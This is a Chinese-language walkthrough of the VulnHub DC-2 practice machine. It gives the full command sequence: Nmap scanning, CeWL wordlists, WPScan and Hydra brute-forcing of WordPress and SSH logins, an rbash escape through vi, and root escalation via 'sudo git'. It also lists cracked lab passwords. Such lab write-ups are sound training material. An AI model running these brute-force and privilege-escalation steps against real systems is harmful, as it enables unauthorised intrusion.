vulnhub靶機DC2記錄
阿新 • • 發佈:2020-08-03
0x00 靶機詳情
下載地址:https://download.vulnhub.com/dc/DC-2.zip
根據描述,和DC-1一樣,需要找到5個flag
0x01 靶機練習
nmap探測存活主機
nmap -sP 192.168.217.0/24
查到靶機ip為192.168.217.130
nmap掃描開放埠
nmap -A -T4 -p- 192.168.217.130
開放了80(http)和7744(ssh)埠
訪問靶機主頁
找到Flag1
根據提示,需要使用Cewl工具製作密碼字典,登入後檢視下一個flag
使用Cewl生成密碼字典
cewl dc-2 -w dc2pass.txt
網站使用的CMS是wordpress,可以使用wpscan工具對該CMS進行掃描
使用wpscan掃描網站使用者
wpscan --url http://dc-2 -e u
發現三個使用者名稱:admin、jerry、tom,使用用這三個使用者名稱生成使用者字典進行爆破
訪問wordpress預設後臺/wp-login.php,找到後臺登入介面
使用wpscan爆破使用者密碼
wpscan --url http://dc-2 -U dc2user.txt -P dc2pass.txt
成功爆破出jerry和tom使用者密碼
使用這兩個使用者進行登入
jerry使用者下找到Flag2
根據提示,需要找到另一個切入點,所以可能需要從另一個7744(ssh)埠入手
使用hydra工具爆破ssh
hydra -L dc2user.txt -P dc2pass.txt -vV 192.168.217.130 -s 7744 ssh
成功爆破出使用者名稱:tom 密碼:parturient
使用tom使用者登入ssh
ssh [email protected] -p 7744
登入ssh後發現 Flag3,cat檢視失敗,發現被限制了。經查詢,需要繞過rbash
Restricted shell繞過
嘗試發現vi可以使用
執行命令
vi 1 :set shell =/bin/sh :shell(執行完上一條再執行) export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (設定環境變數)
成功讀取Flag3
提示中提到jerry和su,嘗試切換到jerry使用者
使用之前爆破出的web下jerry使用者密碼:adipiscing 成功登入
在jerry使用者根目錄下,發現Flag4,直接檢視
根據提示需要使用git命令
git提權
sudo -l #檢視可以使用root許可權無密碼的命令 sudo git help config #提權 !/bin/sh
成功提權
在根目錄發現最終Flag